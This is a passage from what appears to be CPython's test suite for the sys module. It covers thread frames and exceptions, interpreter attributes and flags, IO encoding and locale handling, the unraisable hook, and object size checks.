threading.Thread(target=f123) t.start() entered_g.wait() # At this point, t has finished its entered_g.set(), although it's # impossible to guess whether it's still on that line or has moved on # to its leave_g.wait(). self.assertEqual(len(thread_info), 1) thread_id = thread_info[0] d = sys._current_frames() for tid in d: self.assertIsInstance(tid, int) self.assertGreater(tid, 0) main_id = threading.get_ident() self.assertIn(main_id, d) self.assertIn(thread_id, d) # Verify that the captured main-thread frame is _this_ frame. frame = d.pop(main_id) self.assertTrue(frame is sys._getframe()) # Verify that the captured thread frame is blocked in g456, called # from f123. This is a little tricky, since various bits of # threading.py are also in the thread's call stack. frame = d.pop(thread_id) stack = traceback.extract_stack(frame) for i, (filename, lineno, funcname, sourceline) in enumerate(stack): if funcname == "f123": break else: self.fail("didn't find f123() on thread's call stack") self.assertEqual(sourceline, "g456()") # And the next record must be for g456(). filename, lineno, funcname, sourceline = stack[i+1] self.assertEqual(funcname, "g456") self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"]) # Reap the spawned thread. leave_g.set() t.join() @threading_helper.reap_threads def test_current_exceptions(self): import threading import traceback # Spawn a thread that blocks at a known place. Then the main # thread does sys._current_frames(), and verifies that the frames # returned make sense. entered_g = threading.Event() leave_g = threading.Event() thread_info = [] # the thread's id def f123(): g456() def g456(): thread_info.append(threading.get_ident()) entered_g.set() while True: try: raise ValueError("oops") except ValueError: if leave_g.wait(timeout=support.LONG_TIMEOUT): break t = threading.Thread(target=f123) t.start() entered_g.wait() # At this point, t has finished its entered_g.set(), although it's # impossible to guess whether it's still on that line or has moved on # to its leave_g.wait(). self.assertEqual(len(thread_info), 1) thread_id = thread_info[0] d = sys._current_exceptions() for tid in d: self.assertIsInstance(tid, int) self.assertGreater(tid, 0) main_id = threading.get_ident() self.assertIn(main_id, d) self.assertIn(thread_id, d) self.assertEqual((None, None, None), d.pop(main_id)) # Verify that the captured thread frame is blocked in g456, called # from f123. This is a little tricky, since various bits of # threading.py are also in the thread's call stack. exc_type, exc_value, exc_tb = d.pop(thread_id) stack = traceback.extract_stack(exc_tb.tb_frame) for i, (filename, lineno, funcname, sourceline) in enumerate(stack): if funcname == "f123": break else: self.fail("didn't find f123() on thread's call stack") self.assertEqual(sourceline, "g456()") # And the next record must be for g456(). filename, lineno, funcname, sourceline = stack[i+1] self.assertEqual(funcname, "g456") self.assertTrue(sourceline.startswith("if leave_g.wait(")) # Reap the spawned thread. leave_g.set() t.join() def test_attributes(self): self.assertIsInstance(sys.api_version, int) self.assertIsInstance(sys.argv, list) for arg in sys.argv: self.assertIsInstance(arg, str) self.assertIsInstance(sys.orig_argv, list) for arg in sys.orig_argv: self.assertIsInstance(arg, str) self.assertIn(sys.byteorder, ("little", "big")) self.assertIsInstance(sys.builtin_module_names, tuple) self.assertIsInstance(sys.copyright, str) self.assertIsInstance(sys.exec_prefix, str) self.assertIsInstance(sys.base_exec_prefix, str) self.assertIsInstance(sys.executable, str) self.assertEqual(len(sys.float_info), 11) self.assertEqual(sys.float_info.radix, 2) self.assertEqual(len(sys.int_info), 2) self.assertTrue(sys.int_info.bits_per_digit % 5 == 0) self.assertTrue(sys.int_info.sizeof_digit >= 1) self.assertEqual(type(sys.int_info.bits_per_digit), int) self.assertEqual(type(sys.int_info.sizeof_digit), int) self.assertIsInstance(sys.hexversion, int) self.assertEqual(len(sys.hash_info), 9) self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width) # sys.hash_info.modulus should be a prime; we do a quick # probable primality test (doesn't exclude the possibility of # a Carmichael number) for x in range(1, 100): self.assertEqual( pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus), 1, "sys.hash_info.modulus {} is a non-prime".format( sys.hash_info.modulus) ) self.assertIsInstance(sys.hash_info.inf, int) self.assertIsInstance(sys.hash_info.nan, int) self.assertIsInstance(sys.hash_info.imag, int) algo = sysconfig.get_config_var("Py_HASH_ALGORITHM") if sys.hash_info.algorithm in {"fnv", "siphash24"}: self.assertIn(sys.hash_info.hash_bits, {32, 64}) self.assertIn(sys.hash_info.seed_bits, {32, 64, 128}) if algo == 1: self.assertEqual(sys.hash_info.algorithm, "siphash24") elif algo == 2: self.assertEqual(sys.hash_info.algorithm, "fnv") else: self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"}) else: # PY_HASH_EXTERNAL self.assertEqual(algo, 0) self.assertGreaterEqual(sys.hash_info.cutoff, 0) self.assertLess(sys.hash_info.cutoff, 8) self.assertIsInstance(sys.maxsize, int) self.assertIsInstance(sys.maxunicode, int) self.assertEqual(sys.maxunicode, 0x10FFFF) self.assertIsInstance(sys.platform, str) self.assertIsInstance(sys.prefix, str) self.assertIsInstance(sys.base_prefix, str) self.assertIsInstance(sys.platlibdir, str) self.assertIsInstance(sys.version, str) vi = sys.version_info self.assertIsInstance(vi[:], tuple) self.assertEqual(len(vi), 5) self.assertIsInstance(vi[0], int) self.assertIsInstance(vi[1], int) self.assertIsInstance(vi[2], int) self.assertIn(vi[3], ("alpha", "beta", "candidate", "final")) self.assertIsInstance(vi[4], int) self.assertIsInstance(vi.major, int) self.assertIsInstance(vi.minor, int) self.assertIsInstance(vi.micro, int) self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final")) self.assertIsInstance(vi.serial, int) self.assertEqual(vi[0], vi.major) self.assertEqual(vi[1], vi.minor) self.assertEqual(vi[2], vi.micro) self.assertEqual(vi[3], vi.releaselevel) self.assertEqual(vi[4], vi.serial) self.assertTrue(vi > (1,0,0)) self.assertIsInstance(sys.float_repr_style, str) self.assertIn(sys.float_repr_style, ('short', 'legacy')) if not sys.platform.startswith('win'): self.assertIsInstance(sys.abiflags, str) def test_thread_info(self): info = sys.thread_info self.assertEqual(len(info), 3) self.assertIn(info.name, ('nt', 'pthread', 'solaris', None)) self.assertIn(info.lock, ('semaphore', 'mutex+cond', None)) def test_43581(self): # Can't use sys.stdout, as this is a StringIO object when # the test runs under regrtest. self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding) def test_intern(self): global INTERN_NUMRUNS INTERN_NUMRUNS += 1 self.assertRaises(TypeError, sys.intern) s = "never interned before" + str(INTERN_NUMRUNS) self.assertTrue(sys.intern(s) is s) s2 = s.swapcase().swapcase() self.assertTrue(sys.intern(s2) is s) # Subclasses of string can't be interned, because they # provide too much opportunity for insane things to happen. # We don't want them in the interned dict and if they aren't # actually interned, we don't want to create the appearance # that they are by allowing intern() to succeed. class S(str): def __hash__(self): return 123 self.assertRaises(TypeError, sys.intern, S("abc")) def test_sys_flags(self): self.assertTrue(sys.flags) attrs = ("debug", "inspect", "interactive", "optimize", "dont_write_bytecode", "no_user_site", "no_site", "ignore_environment", "verbose", "bytes_warning", "quiet", "hash_randomization", "isolated", "dev_mode", "utf8_mode", "warn_default_encoding") for attr in attrs: self.assertTrue(hasattr(sys.flags, attr), attr) attr_type = bool if attr == "dev_mode" else int self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr) self.assertTrue(repr(sys.flags)) self.assertEqual(len(sys.flags), len(attrs)) self.assertIn(sys.flags.utf8_mode, {0, 1, 2}) def assert_raise_on_new_sys_type(self, sys_attr): # Users are intentionally prevented from creating new instances of # sys.flags, sys.version_info, and sys.getwindowsversion. arg = sys_attr attr_type = type(sys_attr) with self.assertRaises(TypeError): attr_type(arg) with self.assertRaises(TypeError): attr_type.__new__(attr_type, arg) def test_sys_flags_no_instantiation(self): self.assert_raise_on_new_sys_type(sys.flags) def test_sys_version_info_no_instantiation(self): self.assert_raise_on_new_sys_type(sys.version_info) def test_sys_getwindowsversion_no_instantiation(self): # Skip if not being run on Windows. test.support.get_attribute(sys, "getwindowsversion") self.assert_raise_on_new_sys_type(sys.getwindowsversion()) @test.support.cpython_only def test_clear_type_cache(self): sys._clear_type_cache() def test_ioencoding(self): env = dict(os.environ) # Test character: cent sign, encoded as 0x4A (ASCII J) in CP424, # not representable in ASCII. env["PYTHONIOENCODING"] = "cp424" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout = subprocess.PIPE, env=env) out = p.communicate()[0].strip() expected = ("\xa2" + os.linesep).encode("cp424") self.assertEqual(out, expected) env["PYTHONIOENCODING"] = "ascii:replace" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout = subprocess.PIPE, env=env) out = p.communicate()[0].strip() self.assertEqual(out, b'?') env["PYTHONIOENCODING"] = "ascii" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) out, err = p.communicate() self.assertEqual(out, b'') self.assertIn(b'UnicodeEncodeError:', err) self.assertIn(rb"'\xa2'", err) env["PYTHONIOENCODING"] = "ascii:" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) out, err = p.communicate() self.assertEqual(out, b'') self.assertIn(b'UnicodeEncodeError:', err) self.assertIn(rb"'\xa2'", err) env["PYTHONIOENCODING"] = ":surrogateescape" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'], stdout=subprocess.PIPE, env=env) out = p.communicate()[0].strip() self.assertEqual(out, b'\xbd') @unittest.skipUnless(os_helper.FS_NONASCII, 'requires OS support of non-ASCII encodings') @unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False), 'requires FS encoding to match locale') def test_ioencoding_nonascii(self): env = dict(os.environ) env["PYTHONIOENCODING"] = "" p = subprocess.Popen([sys.executable, "-c", 'print(%a)' % os_helper.FS_NONASCII], stdout=subprocess.PIPE, env=env) out = p.communicate()[0].strip() self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII)) @unittest.skipIf(sys.base_prefix != sys.prefix, 'Test is not venv-compatible') def test_executable(self): # sys.executable should be absolute self.assertEqual(os.path.abspath(sys.executable), sys.executable) # Issue #7774: Ensure that sys.executable is an empty string if argv[0] # has been set to a non existent program name and Python is unable to # retrieve the real program name # For a normal installation, it should work without 'cwd' # argument. For test runs in the build directory, see #7774. python_dir = os.path.dirname(os.path.realpath(sys.executable)) p = subprocess.Popen( ["nonexistent", "-c", 'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'], executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir) stdout = p.communicate()[0] executable = stdout.strip().decode("ASCII") p.wait() self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))]) def check_fsencoding(self, fs_encoding, expected=None): self.assertIsNotNone(fs_encoding) codecs.lookup(fs_encoding) if expected: self.assertEqual(fs_encoding, expected) def test_getfilesystemencoding(self): fs_encoding = sys.getfilesystemencoding() if sys.platform == 'darwin': expected = 'utf-8' else: expected = None self.check_fsencoding(fs_encoding, expected) def c_locale_get_error_handler(self, locale, isolated=False, encoding=None): # Force the POSIX locale env = os.environ.copy() env["LC_ALL"] = locale env["PYTHONCOERCECLOCALE"] = "0" code = '\n'.join(( 'import sys', 'def dump(name):', ' std = getattr(sys, name)', ' print("%s: %s" % (name, std.errors))', 'dump("stdin")', 'dump("stdout")', 'dump("stderr")', )) args = [sys.executable, "-X", "utf8=0", "-c", code] if isolated: args.append("-I") if encoding is not None: env['PYTHONIOENCODING'] = encoding else: env.pop('PYTHONIOENCODING', None) p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True) stdout, stderr = p.communicate() return stdout def check_locale_surrogateescape(self, locale): out = self.c_locale_get_error_handler(locale, isolated=True) self.assertEqual(out, 'stdin: surrogateescape\n' 'stdout: surrogateescape\n' 'stderr: backslashreplace\n') # replace the default error handler out = self.c_locale_get_error_handler(locale, encoding=':ignore') self.assertEqual(out, 'stdin: ignore\n' 'stdout: ignore\n' 'stderr: backslashreplace\n') # force the encoding out = self.c_locale_get_error_handler(locale, encoding='iso8859-1') self.assertEqual(out, 'stdin: strict\n' 'stdout: strict\n' 'stderr: backslashreplace\n') out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:') self.assertEqual(out, 'stdin: strict\n' 'stdout: strict\n' 'stderr: backslashreplace\n') # have no any effect out = self.c_locale_get_error_handler(locale, encoding=':') self.assertEqual(out, 'stdin: surrogateescape\n' 'stdout: surrogateescape\n' 'stderr: backslashreplace\n') out = self.c_locale_get_error_handler(locale, encoding='') self.assertEqual(out, 'stdin: surrogateescape\n' 'stdout: surrogateescape\n' 'stderr: backslashreplace\n') def test_c_locale_surrogateescape(self): self.check_locale_surrogateescape('C') def test_posix_locale_surrogateescape(self): self.check_locale_surrogateescape('POSIX') def test_implementation(self): # This test applies to all implementations equally. levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF} self.assertTrue(hasattr(sys.implementation, 'name')) self.assertTrue(hasattr(sys.implementation, 'version')) self.assertTrue(hasattr(sys.implementation, 'hexversion')) self.assertTrue(hasattr(sys.implementation, 'cache_tag')) version = sys.implementation.version self.assertEqual(version[:2], (version.major, version.minor)) hexversion = (version.major << 24 | version.minor << 16 | version.micro << 8 | levels[version.releaselevel] << 4 | version.serial << 0) self.assertEqual(sys.implementation.hexversion, hexversion) # PEP 421 requires that .name be lower case. self.assertEqual(sys.implementation.name, sys.implementation.name.lower()) @test.support.cpython_only def test_debugmallocstats(self): # Test sys._debugmallocstats() from test.support.script_helper import assert_python_ok args = ['-c', 'import sys; sys._debugmallocstats()'] ret, out, err = assert_python_ok(*args) self.assertIn(b"free PyDictObjects", err) # The function has no parameter self.assertRaises(TypeError, sys._debugmallocstats, True) @unittest.skipUnless(hasattr(sys, "getallocatedblocks"), "sys.getallocatedblocks unavailable on this build") def test_getallocatedblocks(self): try: import _testcapi except ImportError: with_pymalloc = support.with_pymalloc() else: try: alloc_name = _testcapi.pymem_getallocatorsname() except RuntimeError as exc: # "cannot get allocators name" (ex: tracemalloc is used) with_pymalloc = True else: with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug')) # Some sanity checks a = sys.getallocatedblocks() self.assertIs(type(a), int) if with_pymalloc: self.assertGreater(a, 0) else: # When WITH_PYMALLOC isn't available, we don't know anything # about the underlying implementation: the function might # return 0 or something greater. self.assertGreaterEqual(a, 0) try: # While we could imagine a Python session where the number of # multiple buffer objects would exceed the sharing of references, # it is unlikely to happen in a normal test run. self.assertLess(a, sys.gettotalrefcount()) except AttributeError: # gettotalrefcount() not available pass gc.collect() b = sys.getallocatedblocks() self.assertLessEqual(b, a) gc.collect() c = sys.getallocatedblocks() self.assertIn(c, range(b - 50, b + 50)) def test_is_finalizing(self): self.assertIs(sys.is_finalizing(), False) # Don't use the atexit module because _Py_Finalizing is only set # after calling atexit callbacks code = """if 1: import sys class AtExit: is_finalizing = sys.is_finalizing print = print def __del__(self): self.print(self.is_finalizing(), flush=True) # Keep a reference in the __main__ module namespace, so the # AtExit destructor will be called at Python exit ref = AtExit() """ rc, stdout, stderr = assert_python_ok('-c', code) self.assertEqual(stdout.rstrip(), b'True') def test_issue20602(self): # sys.flags and sys.float_info were wiped during shutdown. code = """if 1: import sys class A: def __del__(self, sys=sys): print(sys.flags) print(sys.float_info) a = A() """ rc, out, err = assert_python_ok('-c', code) out = out.splitlines() self.assertIn(b'sys.flags', out[0]) self.assertIn(b'sys.float_info', out[1]) def test_sys_ignores_cleaning_up_user_data(self): code = """if 1: import struct, sys class C: def __init__(self): self.pack = struct.pack def __del__(self): self.pack('I', -42) sys.x = C() """ rc, stdout, stderr = assert_python_ok('-c', code) self.assertEqual(rc, 0) self.assertEqual(stdout.rstrip(), b"") self.assertEqual(stderr.rstrip(), b"") @unittest.skipUnless(hasattr(sys, 'getandroidapilevel'), 'need sys.getandroidapilevel()') def test_getandroidapilevel(self): level = sys.getandroidapilevel() self.assertIsInstance(level, int) self.assertGreater(level, 0) def test_sys_tracebacklimit(self): code = """if 1: import sys def f1(): 1 / 0 def f2(): f1() sys.tracebacklimit = %r f2() """ def check(tracebacklimit, expected): p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit], stderr=subprocess.PIPE) out = p.communicate()[1] self.assertEqual(out.splitlines(), expected) traceback = [ b'Traceback (most recent call last):', b' File "<string>", line 8, in <module>', b' File "<string>", line 6, in f2', b' File "<string>", line 4, in f1', b'ZeroDivisionError: division by zero' ] check(10, traceback) check(3, traceback) check(2, traceback[:1] + traceback[2:]) check(1, traceback[:1] + traceback[3:]) check(0, [traceback[-1]]) check(-1, [traceback[-1]]) check(1<<1000, traceback) check(-1<<1000, [traceback[-1]]) check(None, traceback) def test_no_duplicates_in_meta_path(self): self.assertEqual(len(sys.meta_path), len(set(sys.meta_path))) @unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"), 'needs sys._enablelegacywindowsfsencoding()') def test__enablelegacywindowsfsencoding(self): code = ('import sys', 'sys._enablelegacywindowsfsencoding()', 'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())') rc, out, err = assert_python_ok('-c', '; '.join(code)) out = out.decode('ascii', 'replace').rstrip() self.assertEqual(out, 'mbcs replace') def test_orig_argv(self): code = textwrap.dedent(''' import sys print(sys.argv) print(sys.orig_argv) ''') args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg'] proc = subprocess.run(args, check=True, capture_output=True, text=True) expected = [ repr(['-c', 'arg']), # sys.argv repr(args), # sys.orig_argv ] self.assertEqual(proc.stdout.rstrip().splitlines(), expected, proc) def test_module_names(self): self.assertIsInstance(sys.stdlib_module_names, frozenset) for name in sys.stdlib_module_names: self.assertIsInstance(name, str) def test_stdlib_dir(self): os = import_helper.import_fresh_module('os') marker = getattr(os, '__file__', None) if marker and not os.path.exists(marker): marker = None expected = os.path.dirname(marker) if marker else None self.assertEqual(os.path.normpath(sys._stdlib_dir), os.path.normpath(expected)) @test.support.cpython_only class UnraisableHookTest(unittest.TestCase): def write_unraisable_exc(self, exc, err_msg, obj): import _testcapi import types err_msg2 = f"Exception ignored {err_msg}" try: _testcapi.write_unraisable_exc(exc, err_msg, obj) return types.SimpleNamespace(exc_type=type(exc), exc_value=exc, exc_traceback=exc.__traceback__, err_msg=err_msg2, object=obj) finally: # Explicitly break any reference cycle exc = None def test_original_unraisablehook(self): for err_msg in (None, "original hook"): with self.subTest(err_msg=err_msg): obj = "an object" with test.support.captured_output("stderr") as stderr: with test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): self.write_unraisable_exc(ValueError(42), err_msg, obj) err = stderr.getvalue() if err_msg is not None: self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err) else: self.assertIn(f'Exception ignored in: {obj!r}\n', err) self.assertIn('Traceback (most recent call last):\n', err) self.assertIn('ValueError: 42\n', err) def test_original_unraisablehook_err(self): # bpo-22836: PyErr_WriteUnraisable() should give sensible reports class BrokenDel: def __del__(self): exc = ValueError("del is broken") # The following line is included in the traceback report: raise exc class BrokenStrException(Exception): def __str__(self): raise Exception("str() is broken") class BrokenExceptionDel: def __del__(self): exc = BrokenStrException() # The following line is included in the traceback report: raise exc for test_class in (BrokenDel, BrokenExceptionDel): with self.subTest(test_class): obj = test_class() with test.support.captured_stderr() as stderr, \ test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): # Trigger obj.__del__() del obj report = stderr.getvalue() self.assertIn("Exception ignored", report) self.assertIn(test_class.__del__.__qualname__, report) self.assertIn("test_sys.py", report) self.assertIn("raise exc", report) if test_class is BrokenExceptionDel: self.assertIn("BrokenStrException", report) self.assertIn("<exception str() failed>", report) else: self.assertIn("ValueError", report) self.assertIn("del is broken", report) self.assertTrue(report.endswith("\n")) def test_original_unraisablehook_exception_qualname(self): # See bpo-41031, bpo-45083. # Check that the exception is printed with its qualified name # rather than just classname, and the module names appears # unless it is one of the hard-coded exclusions. class A: class B: class X(Exception): pass for moduleName in 'builtins', '__main__', 'some_module': with self.subTest(moduleName=moduleName): A.B.X.__module__ = moduleName with test.support.captured_stderr() as stderr, \ test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): expected = self.write_unraisable_exc( A.B.X(), "msg", "obj"); report = stderr.getvalue() self.assertIn(A.B.X.__qualname__, report) if moduleName in ['builtins', '__main__']: self.assertNotIn(moduleName + '.', report) else: self.assertIn(moduleName + '.', report) def test_original_unraisablehook_wrong_type(self): exc = ValueError(42) with test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): with self.assertRaises(TypeError): sys.unraisablehook(exc) def test_custom_unraisablehook(self): hook_args = None def hook_func(args): nonlocal hook_args hook_args = args obj = object() try: with test.support.swap_attr(sys, 'unraisablehook', hook_func): expected = self.write_unraisable_exc(ValueError(42), "custom hook", obj) for attr in "exc_type exc_value exc_traceback err_msg object".split(): self.assertEqual(getattr(hook_args, attr), getattr(expected, attr), (hook_args, expected)) finally: # expected and hook_args contain an exception: break reference cycle expected = None hook_args = None def test_custom_unraisablehook_fail(self): def hook_func(*args): raise Exception("hook_func failed") with test.support.captured_output("stderr") as stderr: with test.support.swap_attr(sys, 'unraisablehook', hook_func): self.write_unraisable_exc(ValueError(42), "custom hook fail", None) err = stderr.getvalue() self.assertIn(f'Exception ignored in sys.unraisablehook: ' f'{hook_func!r}\n', err) self.assertIn('Traceback (most recent call last):\n', err) self.assertIn('Exception: hook_func failed\n', err) @test.support.cpython_only class SizeofTest(unittest.TestCase): def setUp(self): self.P = struct.calcsize('P') self.longdigit = sys.int_info.sizeof_digit import _testinternalcapi self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD check_sizeof = test.support.check_sizeof def test_gc_head_size(self): # Check that the gc header size is added to objects tracked by the gc. vsize = test.support.calcvobjsize gc_header_size = self.gc_headsize # bool objects are not gc tracked self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit) # but lists are self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size) def test_errors(self): class BadSizeof: def __sizeof__(self): raise ValueError self.assertRaises(ValueError, sys.getsizeof, BadSizeof()) class InvalidSizeof: def __sizeof__(self): return None self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof()) sentinel = ["sentinel"] self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel) class FloatSizeof: def __sizeof__(self): return 4.5 self.assertRaises(TypeError, sys.getsizeof, FloatSizeof()) self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel) class OverflowSizeof(int): def __sizeof__(self): return int(self) self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)), sys.maxsize + self.gc_headsize) with self.assertRaises(OverflowError): sys.getsizeof(OverflowSizeof(sys.maxsize + 1)) with self.assertRaises(ValueError): sys.getsizeof(OverflowSizeof(-1)) with self.assertRaises((ValueError, OverflowError)): sys.getsizeof(OverflowSizeof(-sys.maxsize - 1)) def test_default(self): size = test.support.calcvobjsize self.assertEqual(sys.getsizeof(True), size('') + self.longdigit) self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit) def test_objecttypes(self): # check all types defined in Objects/ calcsize = struct.calcsize size = test.support.calcobjsize vsize = test.support.calcvobjsize check = self.check_sizeof # bool check(True, vsize('') + self.longdigit) # buffer # XXX # builtin_function_or_method check(len, size('5P')) # bytearray samples = [b'', b'u'*100000] for sample in samples: x = bytearray(sample) check(x, vsize('n2Pi') + x.__alloc__()) # bytearray_iterator check(iter(bytearray()), size('nP')) # bytes check(b'', vsize('n') + 1) check(b'x' * 10, vsize('n') + 11) # cell def get_cell(): x = 42 def inner(): return x return inner check(get_cell().__closure__[0], size('P')) # code def check_code_size(a, expected_size): self.assertGreaterEqual(sys.getsizeof(a), expected_size) check_code_size(get_cell().__code__, size('6i13P')) check_code_size(get_cell.__code__, size('6i13P')) def get_cell2(x): def inner(): return x return inner check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n')) # complex check(complex(0,1), size('2d')) # method_descriptor (descriptor object) check(str.lower, size('3PPP')) # classmethod_descriptor (descriptor object) # XXX # member_descriptor (descriptor object) import datetime check(datetime.timedelta.days, size('3PP')) # getset_descriptor (descriptor object) import collections check(collections.defaultdict.default_factory, size('3PP')) # wrapper_descriptor (descriptor object) check(int.__add__, size('3P2P')) # method-wrapper (descriptor object) check({}.__iter__, size('2P')) # empty dict check({}, size('nQ2P')) # dict check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P')) longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8} check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P')) # dictionary-keyview check({}.keys(), size('P')) # dictionary-valueview check({}.values(), size('P')) # dictionary-itemview check({}.items(), size('P')) # dictionary iterator check(iter({}), size('P2nPn')) # dictionary-keyiterator check(iter({}.keys()), size('P2nPn')) # dictionary-valueiterator check(iter({}.values()), size('P2nPn')) # dictionary-itemiterator check(iter({}.items()), size('P2nPn')) # dictproxy class C(object): pass check(C.__dict__, size('P')) # BaseException check(BaseException(), size('5Pb')) # UnicodeEncodeError check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP')) # UnicodeDecodeError check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP')) # UnicodeTranslateError check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP')) # ellipses check(Ellipsis, size('')) # EncodingMap import codecs, encodings.iso8859_3 x = codecs.charmap_build(encodings.iso8859_3.decoding_table) check(x, size('32B2iB')) # enumerate check(enumerate([]), size('n3P')) # reverse check(reversed(''), size('nP')) # float check(float(0), size('d')) # sys.floatinfo check(sys.float_info, vsize('') + self.P * len(sys.float_info)) # frame import inspect x = inspect.currentframe() check(x, size('3Pi3c')) # function def func(): pass check(func, size('14Pi')) class c(): @staticmethod def foo(): pass @classmethod def bar(cls): pass # staticmethod check(foo, size('PP')) # classmethod check(bar, size('PP')) # generator def get_gen(): yield 1 check(get_gen(), size('P2PPP4P')) # iterator check(iter('abc'), size('lP')) # callable-iterator import re check(re.finditer('',''), size('2P')) # list samples = [[], [1,2,3], ['1', '2', '3']] for sample in samples: check(list(sample), vsize('Pn') + len(sample)*self.P) # sortwrapper (list) # XXX # cmpwrapper (list) # XXX # listiterator (list) check(iter([]), size('lP')) # listreverseiterator (list) check(reversed([]), size('nP')) # int check(0, vsize('')) check(1, vsize('') + self.longdigit) check(-1, vsize('') + self.longdigit) PyLong_BASE = 2**sys.int_info.bits_per_digit check(int(PyLong_BASE), vsize('') + 2*self.longdigit) check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit) check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit) # module check(unittest, size('PnPPP')) # None check(None, size('')) # NotImplementedType check(NotImplemented, size('')) # object check(object(), size('')) # property (descriptor object) class C(object): def getx(self): return self.__x def setx(self, value): self.__x = value def delx(self): del self.__x x = property(getx, setx, delx, "") check(x, size('5Pi')) # PyCapsule # XXX # rangeiterator check(iter(range(1)), size('4l')) # reverse check(reversed(''), size('nP')) # range check(range(1), size('4P')) check(range(66000), size('4P')) # set # frozenset PySet_MINSIZE = 8 samples = [[], range(10), range(50)] s = size('3nP' + PySet_MINSIZE*'nP' + '2nP') for sample in samples: minused = len(sample) if minused == 0: tmp = 1 # the computation of minused is actually a bit more complicated # but this suffices for the sizeof test minused = minused*2 newsize = PySet_MINSIZE while newsize <= minused: newsize = newsize << 1 if newsize <= 8: check(set(sample), s) check(frozenset(sample), s) else: check(set(sample), s + newsize*calcsize('nP')) check(frozenset(sample), s + newsize*calcsize('nP')) # setiterator check(iter(set()), size('P3n')) # slice check(slice(0), size('3P')) # super check(super(int), size('3P')) # tuple check((), vsize('')) check((1,2,3), vsize('') + 3*self.P) # type # static type: PyTypeObject fmt = 'P2nPI13Pl4Pn9Pn11PIPP' s = vsize(fmt) check(int, s) # class s = vsize(fmt + # PyTypeObject '4P' # PyAsyncMethods '36P' # PyNumberMethods '3P' # PyMappingMethods '10P' # PySequenceMethods '2P' # PyBufferProcs '5P') class newstyleclass(object): pass # Separate block for PyDictKeysObject with 8 keys and 5 entries check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + 5*calcsize("n2P")) # dict with shared keys check(newstyleclass().__dict__, size('nQ2P') + 5*self.P) o = newstyleclass() o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1 # Separate block for PyDictKeysObject with 16 keys and 10 entries check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + 10*calcsize("n2P")) # dict with shared keys check(newstyleclass().__dict__, size('nQ2P') + 10*self.P) # unicode # each tuple contains a string and its expected character size # don't put any static strings here, as they may contain # wchar_t or UTF-8 representations samples = ['1'*100, '\xff'*50, '\u0100'*40, '\uffff'*100, '\U00010000'*30, '\U0010ffff'*100] asciifields = "nnbP" compactfields = asciifields + "nPn" unicodefields = compactfields + "P" for s in samples: maxchar = ord(max(s)) if maxchar < 128: L = size(asciifields) + len(s) + 1 elif maxchar < 256: L = size(compactfields) + len(s) + 1 elif maxchar < 65536: L = size(compactfields) + 2*(len(s) + 1) else: L = size(compactfields) + 4*(len(s) + 1) check(s, L) # verify that the UTF-8 size is accounted for s = chr(0x4000) # 4 bytes canonical representation check(s, size(compactfields) + 4) # compile() will trigger the generation of the UTF-8 # representation as a side effect compile(s, "<stdin>", "eval") check(s, size(compactfields) + 4 + 4) # TODO: add check that forces the presence of wchar_t representation # TODO: add check that forces layout of unicodefields # weakref import weakref check(weakref.ref(int), size('2Pn2P')) # weakproxy # XXX # weakcallableproxy check(weakref.proxy(int), size('2Pn2P')) def check_slots(self, obj, base, extra): expected = sys.getsizeof(base) + struct.calcsize(extra) if gc.is_tracked(obj) and not gc.is_tracked(base): expected += self.gc_headsize self.assertEqual(sys.getsizeof(obj), expected) def 